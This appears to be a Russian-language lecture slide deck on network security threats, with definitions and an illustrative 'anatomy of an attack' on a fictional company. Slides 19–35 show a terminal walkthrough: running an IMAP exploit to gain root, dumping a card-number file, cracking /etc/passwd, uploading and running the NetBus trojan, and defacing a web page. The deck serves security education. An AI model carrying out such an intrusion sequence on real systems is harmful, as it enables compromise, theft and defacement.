'

Рост угроз

Понравилась презентация – покажи это...





Слайд 0

Рост угроз Подбор паролей Вирусы Перебор паролей Использование уязвимостей Запрет аудита «Троянские кони» Перехват сессий Sweepers Sniffers Stealth-сканирование Подмена пакета GUI 1980 1985 1990 1995 Low High 2000


Слайд 1

МСЭ E-Mail сервер Web сервер Роутер Рабочие станции Сеть Сервера Типовая схема сегмента корпоративной сети


Слайд 2

Приложение масштаба предприятия Приложение масштаба предприятия различные платформы использование Internet разное ПО и аппаратура различные пользователи масштабность интеграция в технологию обработки информации Результат Данные и системы могут быть: выведены из строя украдены несанкционированно изменены


Слайд 3

Особенности приложений масштаба предприятия Внешние и внутренние злоумышленники Управление безопасностью сосредоточено в разных руках: администраторы безопасности администраторы баз данных системные и сетевые администраторы Web-мастера Ограниченные ресурсы на обеспечение безопасности


Слайд 4

Пример приложений масштаба предприятия: SAP SAP SAP R/3 Клиент Приложение R/3 Серверная ОС База данных R/3 База данных R/3 Серверная ОС WinNT Workstation NT или Unix MS SQL Server или Sybase NT или Unix TCP/IP


Слайд 5

Интервал безопасности Желательный уровень защищенности Реальный уровень защищенности Время Если ничего не делать…


Слайд 6

Интервал безопасности


Слайд 7

Традиционные средства защиты


Слайд 8

Компоненты системы безопасности


Слайд 9

Инфраструктура безопасности


Слайд 10

Инфраструктура безопасности ID Аутентификация Johnsmith ************ Admin


Слайд 11

Инфраструктура безопасности 85urtiowjeuqp08239574i9476ljbmvnxkdkbmg 85urtiowjeuqp08239574i9476ljbmvnx 8573urtiowjeuqp082 memo


Слайд 12

Уязвимости Любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы. ошибки в программах; человеческие ошибки и неправильная конфигурация разрешенный, но неиспользуемый сервис восприимчивость к атакам типа «отказ в обслуживании» ошибки при проектировании


Слайд 13

Угрозы и атаки Атака - любое действие нарушителя, которое приводит к реализации угрозы путем использования уязвимостей информационной системы. Угроза - потенциально возможное событие, действие или процесс, которое посредством воздействия на компоненты информационной системы может привести к нанесению ущерба.


Слайд 14

Информационная инфраструктура


Слайд 15

Анатомия атаки


Слайд 16


Слайд 17

bigwidget.com


Слайд 18


Слайд 19

~$ telnet bigwidget.com 25 Trying 10.0.0.28... Connected to bigwidget.com Escape character is '^]'. hacker: hacker:~$ Connection closed by foreign host. telnet bigwidget.com 143 Trying 10.0.0.28... Connected to bigwidget.com. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU) . logout * BYE bigwidget IMAP4rev1 server terminating connection . OK LOGOUT completed Connection closed by foreign host.


Слайд 20

imap


Слайд 21

imap


Слайд 22


Слайд 23

hacker ~$ ./imap_exploit bigwidget.com IMAP Exploit for Linux. Author: Akylonius (aky@galeb.etf.bg.ac.yu) Modifications: p1 (p1@el8.org) Completed successfully. hacker ~$ telnet bigwidget.com Trying 10.0.0.28... Connected to bigwidget.com. Red Hat Linux release 4.2 (Biltmore) Kernel 2.0.35 on an i686 root bigwidget:~# whoami root bigwidget:~# cat ./hosts 127.0.0.1 localhost localhost.localdomain 208.21.2.10 thevault accounting 208.21.2.11 fasttalk sales 208.21.2.12 geekspeak engineering 208.21.2.13 people human resources 208.21.2.14 thelinks marketing 208.21.2.15 thesource information systems bigwidget:~# cd /etc bigwidget:~# rlogin thevault login:


Слайд 24

Allan B. Smith 6543-2223-1209-4002 12/99 Donna D. Smith 6543-4133-0632-4572 06/98 Jim Smith 6543-2344-1523-5522 01/01 Joseph L.Smith 6543-2356-1882-7532 04/02 Kay L. Smith 6543-2398-1972-4532 06/03 Mary Ann Smith 6543-8933-1332-4222 05/01 Robert F. Smith 6543-0133-5232-3332 05/99 thevault:~# cat visa.txt cd /data/creditcards thevault:~# thevault:~# crack /etc/passwd Cracking /etc/passwd... username: bobman password: nambob username: mary password: mary username: root password: ncc1701 thevault:~# ftp thesource Connected to thesource 220 thesource Microsoft FTP Service (Version 4.0). Name: administrator 331 Password required for administrator. Password: ******* 230 User administrator logged in. Remote system type is Windows_NT.


Слайд 25


Слайд 26


Слайд 27

ftp> cd \temp 250 CDW command successful. ftp> send netbus.exe local: netbus.exe remote: netbus.exe 200 PORT command successful. 150 Opening BINARY mode data connection for netbus.exe 226 Transfer complete. ftp> ftp> quit thevault:~$ telnet thesource Trying 208.21.2.160. .. Connected to thesource.bigwidget.com. Escape character is '^]'. Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381) Welcome to MS Telnet Service Telnet Server Build 5.00.98217.1 login: administrator password: ******* *=============================================================== Welcome to Microsoft Telnet Server. *=============================================================== C:\> cd \temp C:\TEMP> netbus.exe


Слайд 28


Слайд 29

Сеть BigWidget UNIX Firewall E-Mail сервер Web сервер Router NT Рабочие станции сеть UNIX NT UNIX


Слайд 30


Слайд 31


Слайд 32


Слайд 33


Слайд 34


Слайд 35

c:\> ftp webcentral Connected to webcentral 220 webcentral Microsoft FTP Service (Version 4.0). Name: jsmith 331 Password required for jsmith. Password: ******* 230 User jsmith logged in. Remote system type is Windows_NT. ftp> send index.html local: bigwedgie.html remote: index.html 200 PORT command successful. 150 Opening BINARY mode data connection for index.html 226 Transfer complete. ftp> ftp> quit 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07 . -rwxr-xr-x 9 root root 1024 Aug 17 17:07 .. -rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif -rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif -rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg -rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec) ftp> dir


Слайд 36


Слайд 37

UNIX Firewall E-Mail сервер Web сервер Router NT Рабочие станции Сеть UNIX NT UNIX


Слайд 38

Вопросы


×

HTML:





Ссылка: